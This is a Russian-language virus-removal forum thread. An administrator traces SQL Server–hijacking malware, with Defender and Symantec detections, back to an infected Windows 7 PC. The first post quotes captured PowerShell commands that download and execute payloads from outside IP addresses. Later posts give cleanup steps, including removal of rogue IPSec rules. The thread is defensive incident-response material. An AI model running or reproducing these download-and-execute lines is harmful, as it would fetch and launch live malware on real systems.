Перейти к содержанию
Правила раздела

Trojan:Win32/HijackSQLServer.AB and Trojan:XML/SuspBuild.MJ!ibt and ISB.Downloader!gen173

Xxandr

Автор Xxandr
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Xxandr

Xxandr

Опубликовано
Опубликовано

Доброго дня!

 

Защитник (Trojan:Win32/HijackSQLServer.AB) на Win 2016 ликвидирует вот такие критические угрозы. (скриншот 1 и 2) За день таких попыток вредоносное ПО предпринимает несколько раз. Процесс запускается от пользователя MSSQLSERVER.

В случае Win 2008 и с антивирусом Symantec (ISB.Downloader!gen173) также фиксируются и ликвидируются эти угрозы (скриншот 3), однако уже от пользователя NETWORK SERVICE.

 

В предыдущий раз когда эта проблема была на 2012 винде без антивируса, то эффект был в виде заполнения озу множественными процессами powershell с параметрами типа

 

CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png

 

Пожалуйста, помогите побороть эту беду.

mstsc_mx9pDrZu0I.png

mstsc_qvpW6ThmX2.png

gtXgUAbtoS.png

Sandor

Sandor

Опубликовано
Опубликовано

Дополнительно, пожалуйста:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Sandor

Sandor

Опубликовано
Опубликовано

Разрешения на эти порты задавали самостоятельно?

Цитата

FirewallRules: [{ACDD6BAE-354C-4C3A-A625-07BF69EA9595}] => (Allow) LPort=1303
FirewallRules: [{6D9143FF-6E7F-4AE7-815F-886CE4C1BBEC}] => (Allow) LPort=3381
FirewallRules: [{58CFFC2A-D66F-4D54-B494-1E56BA28AEC3}] => (Allow) LPort=475
FirewallRules: [{04F6DEBB-AF2C-4E9B-9056-F5AD7F131722}] => (Allow) LPort=475


 

Xxandr

Xxandr

Опубликовано
  • Автор
Опубликовано
25 минут назад, Sandor сказал:

Разрешения на эти порты задавали самостоятельно?


 

да. все были сделаны принудительно. Но сейчас вижу что часть из них уже неактуальна, например 475 - правило для этого порта закрываю. А для остальных я сделаю более детальное правила: добавлю приложения, которые эксплуатируют эти порты.

Sandor

Sandor

Опубликовано
Опубликовано

Да, сделайте это. И некоторое время подождите, попросил подключиться коллегу.

Xxandr

Xxandr

Опубликовано
  • Автор
Опубликовано (изменено)

ещё одно наблюдение. Я посмотрел время и дни в журналах  Symantec. И оказывается что:

- первая угроза происходит в начале рабочего дня - с 7 до 8 утра. А последняя в конце рабочего дня. Но некоторые сотрудники у нас заканчивают работу по разному: с 15:00 и до 17:00 крайняя ликвидированная угроза за день.

- атаки не происходят на выходных, когда в офисе на 99% нет ПК-юзеров

 

Завтра проведу эксперимент с поочерёдным включением наиболее подозрительных станций.

Изменено пользователем Xxandr
Xxandr

Xxandr

Опубликовано
  • Автор
Опубликовано

Ещё.

Решил поизучать журнал SQL сервера. Оказалось, что в тоже самое время (+/- 1 минута) в журнале зафиксированы неудачные попытки подключения к серверу с одного из ПК, который уже изолирован от сети.

Неудача заключается в неправильном пароле. Однако, скорее всего работает перебор паролей, где вирусное ПО всё же подбирает актуальный пароль и осуществляет атаку.

Sandor

Sandor

Опубликовано
Опубликовано
1 минуту назад, Xxandr сказал:

одного из ПК

Если в сети нет централизованного управления защитой, пройдитесь на каждом ПК хотя бы KVRT.

  • Like (+1) 1
Xxandr

Xxandr

Опубликовано
  • Автор
Опубликовано

Итак, как и ожидалось, виновник - клиент (ПК) из журнала MSSQL. Причём, это самый обычный ПК юзера для RDP-сеансов,  Windows 7. После его отключения от сети атаки прекратились.

Запустил на нём KVRT.

Найдена вот такая беда - скриншот 1. В карантин не копируется, видимо из-за занятости его системой. Сам файл отсутствует по такому пути C:\Windows\System32\MsB9AB2A36App.dll даже при активации скрытых элементов. Хотя, при повторной проверке KVRT он там находится, судя по отчёту. А ещё KMS драйвер был замечен, и тоже в SYSTEM32. 

Файлы отчёта прикрепляю.

 

Find.jpg

reports.zip

thyrex

thyrex

Опубликовано
Опубликовано

Логи по правилам соберите на той машине.

SQ

SQ

Опубликовано
Опубликовано

Здравствуйте,

HiJackThis (из каталога autologger) профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже. 


O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block

 

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

Могли бы также проверить пожалуйста, если в вашей базе-данных не появились странные пользователи или задачи?
 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • leon4324
      Trojan:Win32/Wacatac.B!ml
      Автор leon4324
      скачал с сайта какого то кряк на вегас про 17, виндовс дефендер сразу начал ругаться кинул угрозу о том что появился троян Trojan:Win32/Wacatac.B!ml и дальше посыпалось открывание смд и повер шелов, сразу кинул на удаление трояна, посыпалось куча других. закрывал браузер и была какая то белая иконка в диспечере   сейчас он грузит это   дк вб присылает это, я не знаю че делать


      так же это приложение которое 6fk висит в диспечере
      вот логи
    • T23
      Trojan:Win32/Wacatac.H!ml
      Автор T23
      Пж помогите решить проблему.

    • modger
      Trojan:win32/phonzy.a!ml
      Автор modger
      Добрый вечер, напоролся на классный троян который не могу снести, антивирусы его при полном сканировании не обнаруживают, в безопасном режиме тоже мучался, этот троян не хочет уходить с моего ноутбука ни как. Он скачивался на рабочий стол в папку которой уже нет с момента как понял, что скачал вирусняк все же. В защите от вирусов и угроз по началу отображалось 2 угроза, затем одна, а теперь снова две по ходу всех махинаций, на данный момент мне показывает, что троян находится в несуществующей папке на рабочем столе. Пробовал по ходу всего этого скачать троян ремувер, скачать удалось, а открыть не дает в никакую.
      Мне очень нужна помощь, сносить систему вообще не вариант. 
      Обращаюсь впервые жизни на форум после того как видел это решение проблемы
      На данный момент я на этапе сканирования в программе FRST с теми же галочками как и было указано в том решении проблемы по ссылке.
      Прикрепил отчеты.
      Далее я не делал так как помощник на том вопросе указал, что не нужно повторять, ибо это может крашнуть винду, так как то что он делал относилось конкретно к тому человеку у которого была эта проблема.


      Addition.txt FRST.txt
    • Alexey78
      Словил Trojan:Win32/TurtleLoader.REG
      Автор Alexey78
      Здравствуйте. Словил Trojan:Win32/TurtleLoader.REG.
      Никакие антивирусы не видят его. только стандартные средства Win-11 показывает.
      После загрузки компа сразу же выскакивает окно Powershell 
      С такой записью. 
       
      строка:1 знак:1 + [byte[]] $bytes = (Get-ItemProperty HKCU:\Software\ekkef\).jkfj;[Arra ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Этот сценарий содержит вредоносное содержимое и был заблокирован антивирусным программным обеспечением.     + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException     + FullyQualifiedErrorId : ScriptContainedMaliciousContent PS C:\WINDOWS\system32>
      Окно закрываю, и через секунду оно опять выскакивает. (
      Не представляю вообще что надо делать. Помогите люди добрые ))

       
    • pxvel
      Trojan:Win32/Wacatac.B!ml
      Автор pxvel
      Добрый день! Не могу понять, почему антивирусник жалуется на Trojan:Win32/Wacatac.B!ml ?! Уже проверял через все возможные утилиты (включая Kaspersky), но ничего не нашло. Жалуется только антивирусник от Windows. Пытался удалить троян по тем путям, которые он затронул. Но бесполезно. Также пытался удалить через сам этот защитник. Но при нажатии на кнопку "Удалить" или "Поместить в карантин", ничего не меняется. Что делать? Помогите, пожалуйста, буду признателен!
×
×
  • Создать...